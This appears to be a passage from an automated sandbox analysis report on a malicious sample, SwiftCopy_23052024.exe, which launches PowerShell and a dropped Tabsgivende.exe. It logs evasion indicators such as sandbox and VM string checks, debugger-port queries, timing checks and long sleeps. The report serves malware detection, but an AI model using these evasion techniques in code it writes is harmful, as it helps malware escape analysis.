Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe

Code function: 18_2_2256096E rdtsc

18_2_2256096E

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7598			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2169			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe

API coverage: 0.3 %

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5960

Thread sleep time: -6456360425798339s >= -30000s

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\wlanext.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe	Code function: 0_2_004062F0 FindFirstFileA,FindClose,	0_2_004062F0
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe	Code function: 0_2_00402765 FindFirstFileA,	0_2_00402765
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe	Code function: 0_2_004057B5 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_004057B5

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: SwiftCopy_23052024.exe, 00000000.00000002.1237405102.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Tabsgivende.exe, 00000012.00000002.2361654109.0000000006610000.00000004.00000020.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000002.2361867653.0000000006662000.00000004.00000020.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000003.2244185698.0000000006662000.00000004.00000020.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000003.2243920932.0000000006662000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: SwiftCopy_23052024.exe, 00000000.00000002.1237405102.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000002.00000002.2193801394.0000000006D12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe	API call chain: ExitProcess graph end node			graph_0-3372
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe	API call chain: ExitProcess graph end node			graph_0-3186

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe

Code function: 18_2_2256096E rdtsc

18_2_2256096E

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 2_2_026ED244 LdrInitializeThunk,LdrInitializeThunk,

2_2_026ED244

Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2251A250 mov eax, dword ptr fs:[00000030h]	18_2_2251A250
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22526259 mov eax, dword ptr fs:[00000030h]	18_2_22526259
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A8243 mov eax, dword ptr fs:[00000030h]	18_2_225A8243
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A8243 mov ecx, dword ptr fs:[00000030h]	18_2_225A8243
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225D0274 mov eax, dword ptr fs:[00000030h]	18_2_225D0274
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225D0274 mov eax, dword ptr fs:[00000030h]	18_2_225D0274
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225D0274 mov eax, dword ptr fs:[00000030h]	18_2_225D0274
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225D0274 mov eax, dword ptr fs:[00000030h]	18_2_225D0274
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225D0274 mov eax, dword ptr fs:[00000030h]	18_2_225D0274
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225D0274 mov eax, dword ptr fs:[00000030h]	18_2_225D0274
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225D0274 mov eax, dword ptr fs:[00000030h]	18_2_225D0274
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225D0274 mov eax, dword ptr fs:[00000030h]	18_2_225D0274
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225D0274 mov eax, dword ptr fs:[00000030h]	18_2_225D0274
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225D0274 mov eax, dword ptr fs:[00000030h]	18_2_225D0274
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225D0274 mov eax, dword ptr fs:[00000030h]	18_2_225D0274
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225D0274 mov eax, dword ptr fs:[00000030h]	18_2_225D0274
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22524260 mov eax, dword ptr fs:[00000030h]	18_2_22524260
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22524260 mov eax, dword ptr fs:[00000030h]	18_2_22524260
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22524260 mov eax, dword ptr fs:[00000030h]	18_2_22524260
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2251826B mov eax, dword ptr fs:[00000030h]	18_2_2251826B
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2251823B mov eax, dword ptr fs:[00000030h]	18_2_2251823B
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2252A2C3 mov eax, dword ptr fs:[00000030h]	18_2_2252A2C3
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2252A2C3 mov eax, dword ptr fs:[00000030h]	18_2_2252A2C3
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2252A2C3 mov eax, dword ptr fs:[00000030h]	18_2_2252A2C3
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2252A2C3 mov eax, dword ptr fs:[00000030h]	18_2_2252A2C3
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2252A2C3 mov eax, dword ptr fs:[00000030h]	18_2_2252A2C3
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225302E1 mov eax, dword ptr fs:[00000030h]	18_2_225302E1
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225302E1 mov eax, dword ptr fs:[00000030h]	18_2_225302E1
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225302E1 mov eax, dword ptr fs:[00000030h]	18_2_225302E1
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255E284 mov eax, dword ptr fs:[00000030h]	18_2_2255E284
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255E284 mov eax, dword ptr fs:[00000030h]	18_2_2255E284
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A0283 mov eax, dword ptr fs:[00000030h]	18_2_225A0283
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A0283 mov eax, dword ptr fs:[00000030h]	18_2_225A0283
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A0283 mov eax, dword ptr fs:[00000030h]	18_2_225A0283
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225302A0 mov eax, dword ptr fs:[00000030h]	18_2_225302A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225302A0 mov eax, dword ptr fs:[00000030h]	18_2_225302A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225B62A0 mov eax, dword ptr fs:[00000030h]	18_2_225B62A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225B62A0 mov ecx, dword ptr fs:[00000030h]	18_2_225B62A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225B62A0 mov eax, dword ptr fs:[00000030h]	18_2_225B62A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225B62A0 mov eax, dword ptr fs:[00000030h]	18_2_225B62A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225B62A0 mov eax, dword ptr fs:[00000030h]	18_2_225B62A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225B62A0 mov eax, dword ptr fs:[00000030h]	18_2_225B62A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A035C mov eax, dword ptr fs:[00000030h]	18_2_225A035C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A035C mov eax, dword ptr fs:[00000030h]	18_2_225A035C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A035C mov eax, dword ptr fs:[00000030h]	18_2_225A035C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A035C mov ecx, dword ptr fs:[00000030h]	18_2_225A035C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A035C mov eax, dword ptr fs:[00000030h]	18_2_225A035C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A035C mov eax, dword ptr fs:[00000030h]	18_2_225A035C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225EA352 mov eax, dword ptr fs:[00000030h]	18_2_225EA352
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A2349 mov eax, dword ptr fs:[00000030h]	18_2_225A2349
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A2349 mov eax, dword ptr fs:[00000030h]	18_2_225A2349
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A2349 mov eax, dword ptr fs:[00000030h]	18_2_225A2349
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A2349 mov eax, dword ptr fs:[00000030h]	18_2_225A2349
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A2349 mov eax, dword ptr fs:[00000030h]	18_2_225A2349
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A2349 mov eax, dword ptr fs:[00000030h]	18_2_225A2349
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A2349 mov eax, dword ptr fs:[00000030h]	18_2_225A2349
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A2349 mov eax, dword ptr fs:[00000030h]	18_2_225A2349
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A2349 mov eax, dword ptr fs:[00000030h]	18_2_225A2349
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A2349 mov eax, dword ptr fs:[00000030h]	18_2_225A2349
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A2349 mov eax, dword ptr fs:[00000030h]	18_2_225A2349
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A2349 mov eax, dword ptr fs:[00000030h]	18_2_225A2349
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A2349 mov eax, dword ptr fs:[00000030h]	18_2_225A2349
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A2349 mov eax, dword ptr fs:[00000030h]	18_2_225A2349
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A2349 mov eax, dword ptr fs:[00000030h]	18_2_225A2349
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225C437C mov eax, dword ptr fs:[00000030h]	18_2_225C437C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2251C310 mov ecx, dword ptr fs:[00000030h]	18_2_2251C310
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22540310 mov ecx, dword ptr fs:[00000030h]	18_2_22540310
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255A30B mov eax, dword ptr fs:[00000030h]	18_2_2255A30B
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255A30B mov eax, dword ptr fs:[00000030h]	18_2_2255A30B
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255A30B mov eax, dword ptr fs:[00000030h]	18_2_2255A30B
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225DC3CD mov eax, dword ptr fs:[00000030h]	18_2_225DC3CD
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2252A3C0 mov eax, dword ptr fs:[00000030h]	18_2_2252A3C0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2252A3C0 mov eax, dword ptr fs:[00000030h]	18_2_2252A3C0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2252A3C0 mov eax, dword ptr fs:[00000030h]	18_2_2252A3C0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2252A3C0 mov eax, dword ptr fs:[00000030h]	18_2_2252A3C0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2252A3C0 mov eax, dword ptr fs:[00000030h]	18_2_2252A3C0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2252A3C0 mov eax, dword ptr fs:[00000030h]	18_2_2252A3C0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225283C0 mov eax, dword ptr fs:[00000030h]	18_2_225283C0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225283C0 mov eax, dword ptr fs:[00000030h]	18_2_225283C0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225283C0 mov eax, dword ptr fs:[00000030h]	18_2_225283C0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225283C0 mov eax, dword ptr fs:[00000030h]	18_2_225283C0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A63C0 mov eax, dword ptr fs:[00000030h]	18_2_225A63C0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2253E3F0 mov eax, dword ptr fs:[00000030h]	18_2_2253E3F0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2253E3F0 mov eax, dword ptr fs:[00000030h]	18_2_2253E3F0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2253E3F0 mov eax, dword ptr fs:[00000030h]	18_2_2253E3F0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225563FF mov eax, dword ptr fs:[00000030h]	18_2_225563FF
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225303E9 mov eax, dword ptr fs:[00000030h]	18_2_225303E9
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225303E9 mov eax, dword ptr fs:[00000030h]	18_2_225303E9
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225303E9 mov eax, dword ptr fs:[00000030h]	18_2_225303E9
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225303E9 mov eax, dword ptr fs:[00000030h]	18_2_225303E9
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225303E9 mov eax, dword ptr fs:[00000030h]	18_2_225303E9
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225303E9 mov eax, dword ptr fs:[00000030h]	18_2_225303E9
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225303E9 mov eax, dword ptr fs:[00000030h]	18_2_225303E9
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225303E9 mov eax, dword ptr fs:[00000030h]	18_2_225303E9
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22518397 mov eax, dword ptr fs:[00000030h]	18_2_22518397
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22518397 mov eax, dword ptr fs:[00000030h]	18_2_22518397
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22518397 mov eax, dword ptr fs:[00000030h]	18_2_22518397
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2251E388 mov eax, dword ptr fs:[00000030h]	18_2_2251E388
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2251E388 mov eax, dword ptr fs:[00000030h]	18_2_2251E388
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2251E388 mov eax, dword ptr fs:[00000030h]	18_2_2251E388
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2254438F mov eax, dword ptr fs:[00000030h]	18_2_2254438F
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2254438F mov eax, dword ptr fs:[00000030h]	18_2_2254438F
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22522050 mov eax, dword ptr fs:[00000030h]	18_2_22522050
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A6050 mov eax, dword ptr fs:[00000030h]	18_2_225A6050
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2254C073 mov eax, dword ptr fs:[00000030h]	18_2_2254C073
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2253E016 mov eax, dword ptr fs:[00000030h]	18_2_2253E016
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2253E016 mov eax, dword ptr fs:[00000030h]	18_2_2253E016
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2253E016 mov eax, dword ptr fs:[00000030h]	18_2_2253E016
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2253E016 mov eax, dword ptr fs:[00000030h]	18_2_2253E016
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A4000 mov ecx, dword ptr fs:[00000030h]	18_2_225A4000
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225B6030 mov eax, dword ptr fs:[00000030h]	18_2_225B6030
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2251A020 mov eax, dword ptr fs:[00000030h]	18_2_2251A020
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2251C020 mov eax, dword ptr fs:[00000030h]	18_2_2251C020
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A20DE mov eax, dword ptr fs:[00000030h]	18_2_225A20DE
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2251C0F0 mov eax, dword ptr fs:[00000030h]	18_2_2251C0F0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225620F0 mov ecx, dword ptr fs:[00000030h]	18_2_225620F0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2251A0E3 mov ecx, dword ptr fs:[00000030h]	18_2_2251A0E3
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A60E0 mov eax, dword ptr fs:[00000030h]	18_2_225A60E0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225280E9 mov eax, dword ptr fs:[00000030h]	18_2_225280E9
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2252208A mov eax, dword ptr fs:[00000030h]	18_2_2252208A
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225E60B8 mov eax, dword ptr fs:[00000030h]	18_2_225E60B8
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225E60B8 mov ecx, dword ptr fs:[00000030h]	18_2_225E60B8
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225B80A8 mov eax, dword ptr fs:[00000030h]	18_2_225B80A8
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225B8158 mov eax, dword ptr fs:[00000030h]	18_2_225B8158
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22526154 mov eax, dword ptr fs:[00000030h]	18_2_22526154
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22526154 mov eax, dword ptr fs:[00000030h]	18_2_22526154
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2251C156 mov eax, dword ptr fs:[00000030h]	18_2_2251C156
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225B4144 mov eax, dword ptr fs:[00000030h]	18_2_225B4144
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225B4144 mov eax, dword ptr fs:[00000030h]	18_2_225B4144
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225B4144 mov ecx, dword ptr fs:[00000030h]	18_2_225B4144
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225B4144 mov eax, dword ptr fs:[00000030h]	18_2_225B4144
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225B4144 mov eax, dword ptr fs:[00000030h]	18_2_225B4144
